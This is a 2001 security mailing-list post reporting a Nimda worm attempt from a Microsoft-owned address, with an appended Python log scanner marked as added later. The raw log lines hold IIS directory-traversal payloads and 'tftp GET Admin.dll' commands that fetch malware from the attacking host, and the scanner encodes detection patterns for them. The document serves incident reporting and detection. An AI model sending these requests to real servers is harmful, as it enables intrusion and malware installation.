[ISN] Microsoft's Early Xmas Present.

From: InfoSec News (isnat_private)
Date: Fri Dec 28 2001 - 20:21:10 PST


Forwarded from: Jay D. Dyson <jdysonat_private>

Also sent to SecurityFocus's Incidents list.

-----BEGIN PGP SIGNED MESSAGE-----

Hi folks,

	Normally I wouldn't be sending this out, but I figure folks need
to be aware and wary, considering the origin of this intrusion attempt.

	I received an early Xmas present from Microsoft.  No, I didn't get
XP, nor did I get the latest Office software suite.

	I got a Nimda intrusion attempt.

	Early Bird[1] picked up on this intrusion attempt and immediately
notified Microsoft.  I've yet to hear back from Microsoft as to why this
attack from their network came to pass[2].

	For those who are interested, here's the log excerpt. 

208.229.100.126 - - [24/Dec/2001:19:34:36 -0800] "GET /scripts/root.exe?/c+dir HTTP/1.0" 200 367 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:34:46 -0800] "GET /scripts/root.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20Admin.dll HTTP/1.0" 200 421 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:34:56 -0800] "GET /scripts/Admin.dll HTTP/1.0" 200 361 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:35:06 -0800] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 200 365 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:35:17 -0800] "GET /MSADC/root.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20Admin.dll HTTP/1.0" 200 419 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:35:27 -0800] "GET /MSADC/Admin.dll HTTP/1.0" 200 359 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:35:37 -0800] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 375 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:35:51 -0800] "GET /c/winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20c:\Admin.dll HTTP/1.0" 200 432 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:36:07 -0800] "GET /c/winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20d:\Admin.dll HTTP/1.0" 200 432 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:36:18 -0800] "GET /c/winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20e:\Admin.dll HTTP/1.0" 200 432 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:36:28 -0800] "GET /c/Admin.dll HTTP/1.0" 200 355 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:36:38 -0800] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 375 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:36:49 -0800] "GET /d/winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20c:\Admin.dll HTTP/1.0" 200 432 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:36:59 -0800] "GET /d/winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20d:\Admin.dll HTTP/1.0" 200 432 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:37:09 -0800] "GET /d/winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20e:\Admin.dll HTTP/1.0" 200 432 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:37:23 -0800] "GET /d/Admin.dll HTTP/1.0" 200 355 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:37:39 -0800] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 391 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:37:54 -0800] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20c:\Admin.dll HTTP/1.0" 200 448 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:38:10 -0800] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20d:\Admin.dll HTTP/1.0" 200 448 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:38:24 -0800] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20e:\Admin.dll HTTP/1.0" 200 448 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:38:35 -0800] "GET /scripts/..%255c../Admin.dll HTTP/1.0" 200 371 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:38:45 -0800] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 412 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:39:00 -0800] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20c:\Admin.dll HTTP/1.0" 200 469 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:39:11 -0800] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20d:\Admin.dll HTTP/1.0" 200 469 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:39:25 -0800] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20e:\Admin.dll HTTP/1.0" 200 469 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:39:40 -0800] "GET /_vti_bin/..%255c../..%255c../..%255c../Admin.dll HTTP/1.0" 200 392 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:39:51 -0800] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 412 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:40:06 -0800] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20c:\Admin.dll HTTP/1.0" 200 469 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:40:17 -0800] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20d:\Admin.dll HTTP/1.0" 200 469 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:40:31 -0800] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20e:\Admin.dll HTTP/1.0" 200 469 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:40:46 -0800] "GET /_mem_bin/..%255c../..%255c../..%255c../Admin.dll HTTP/1.0" 200 392 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:40:57 -0800] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 440 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:41:12 -0800] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20c:\Admin.dll HTTP/1.0" 200 497 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:41:23 -0800] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20d:\Admin.dll HTTP/1.0" 200 497 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:41:37 -0800] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20e:\Admin.dll HTTP/1.0" 200 497 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:41:52 -0800] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../Admin.dll HTTP/1.0" 200 420 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:42:03 -0800] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 392 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:42:18 -0800] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20c:\Admin.dll HTTP/1.0" 200 449 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:42:29 -0800] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20d:\Admin.dll HTTP/1.0" 200 449 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:42:43 -0800] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20e:\Admin.dll HTTP/1.0" 200 449 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:42:58 -0800] "GET /scripts/..%c1%1c../Admin.dll HTTP/1.0" 200 372 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:43:09 -0800] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 392 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:43:09 -0800] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-"
208.229.100.126 - - [24/Dec/2001:19:43:19 -0800] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20c:\Admin.dll HTTP/1.0" 200 449 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:43:29 -0800] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20d:\Admin.dll HTTP/1.0" 200 449 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:43:40 -0800] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20e:\Admin.dll HTTP/1.0" 200 449 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:43:50 -0800] "GET /scripts/..%c0%af../Admin.dll HTTP/1.0" 200 372 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:44:09 -0800] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 392 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:44:20 -0800] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20c:\Admin.dll HTTP/1.0" 200 449 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:44:31 -0800] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20d:\Admin.dll HTTP/1.0" 200 449 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:44:41 -0800] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20e:\Admin.dll HTTP/1.0" 200 449 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:44:51 -0800] "GET /scripts/..%c1%9c../Admin.dll HTTP/1.0" 200 372 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:45:01 -0800] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 353 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:45:02 -0800] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 353 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:45:02 -0800] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 395 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:45:12 -0800] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20c:\Admin.dll HTTP/1.0" 200 452 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:45:23 -0800] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20d:\Admin.dll HTTP/1.0" 200 452 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:45:33 -0800] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20e:\Admin.dll HTTP/1.0" 200 452 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:45:43 -0800] "GET /scripts/..%25%35%63../Admin.dll HTTP/1.0" 200 375 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:45:57 -0800] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 391 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:46:13 -0800] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20c:\Admin.dll HTTP/1.0" 200 448 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:46:28 -0800] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20d:\Admin.dll HTTP/1.0" 200 448 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:46:44 -0800] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20e:\Admin.dll HTTP/1.0" 200 448 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:46:58 -0800] "GET /scripts/..%252f../Admin.dll HTTP/1.0" 200 371 "-" "-"

$ whois -h whois.arin.net 208.229.100.126

Microsoft Labs (NETBLK-UU-208-229-100-D1)
   One Microsoft Way
   Redmond, WA 98052
   US

   Netname: UU-208-229-100-D1
   Netblock: 208.229.100.0 - 208.229.101.255

   Coordinator:
      Steig, Rick  (RS8676-ARIN)  a-rickstat_private
      (425) 703-3061

   Record last updated on 03-Nov-1997.
   Database last updated on  27-Dec-2001 19:55:32 EDT.

- -Jay

1.	http://www.treachery.net/earlybird/
2.	If anyone from Microsoft is reading this, I'd appreciate something
	more pleasant next holiday season.  (FYI, the machine you hit ran
	XP for only 15 seconds.  It now runs Linux.)

   (    (                                                        _______
   ))   ))   .-"There's always time for a good cup of coffee"-.   >====<--.
 C|~~|C|~~| (>----- Jay D. Dyson -- jdysonat_private -----<) |    = |-'
  `--' `--'  `---------- Si vis pacem, para bellum. ----------'  `------'
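A small detector for the probe pattern shown in the log excerpt above, added here as an example and not part of Jay's post or of the Early Bird tool. It assumes Apache combined log format (as in the excerpt) and runs over a constructed sample in which a documentation address stands in for the real source IP.

```python
import re
from urllib.parse import unquote

# Constructed sample in Apache combined log format, modelled on the probe
# sequence in the post above; the source address is a documentation IP.
SAMPLE_LOG = """\
192.0.2.10 - - [24/Dec/2001:19:34:36 -0800] "GET /scripts/root.exe?/c+dir HTTP/1.0" 200 367 "-" "-"
192.0.2.10 - - [24/Dec/2001:19:37:54 -0800] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+tftp%20-i%20192.0.2.10%20GET%20Admin.dll%20c:\\Admin.dll HTTP/1.0" 200 448 "-" "-"
192.0.2.10 - - [24/Dec/2001:19:43:09 -0800] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-"
192.0.2.10 - - [24/Dec/2001:19:45:01 -0800] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 353 "-" "-"
198.51.100.7 - - [24/Dec/2001:20:01:00 -0800] "GET /index.html HTTP/1.0" 200 1024 "-" "Mozilla/4.0"
"""

LINE_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                     r'"(?P<method>\S+) (?P<target>\S+) [^"]+" (?P<status>\d{3}) ')
SHELL_RE = re.compile(r"/(cmd|root)\.exe$", re.I)        # web-reachable command shell
FETCH_RE = re.compile(r"\btftp\b.*\bAdmin\.dll\b", re.I)  # Nimda pulling Admin.dll over TFTP
OVERLONG_RE = re.compile(r"%c[01]%[0-9a-f]{2}", re.I)     # %c0%af, %c1%1c, %c1%9c: Unicode traversal

def classify(target: str) -> list[str]:
    """Return the Nimda-style indicators present in one request target."""
    path, _, query = target.partition("?")
    once = unquote(path)    # what a single decode pass yields
    twice = unquote(once)   # what a server that decodes a second time acts on
    hits = []
    if OVERLONG_RE.search(path):
        hits.append("overlong_utf8_traversal")
    if twice != once and "../" in twice.replace("\\", "/"):
        hits.append("double_decode_traversal")   # e.g. %255c -> %5c -> backslash
    if SHELL_RE.search(twice):
        hits.append("shell_exec")
    if FETCH_RE.search(unquote(query)):
        hits.append("nimda_fetch")
    return hits

def scan(log_text: str) -> list[dict]:
    """Parse combined-format lines and report those carrying Nimda indicators.
    The status code is kept so that a 200 to a shell probe can be triaged first."""
    findings = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        hits = classify(m["target"])
        if hits:
            findings.append({"ip": m["ip"], "status": int(m["status"]),
                             "target": m["target"], "indicators": hits})
    return findings
```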




ISN is currently hosted by Attrition.org



This archive was generated by hypermail 2b30 : Sat Dec 29 2001 - 01:19:18 PST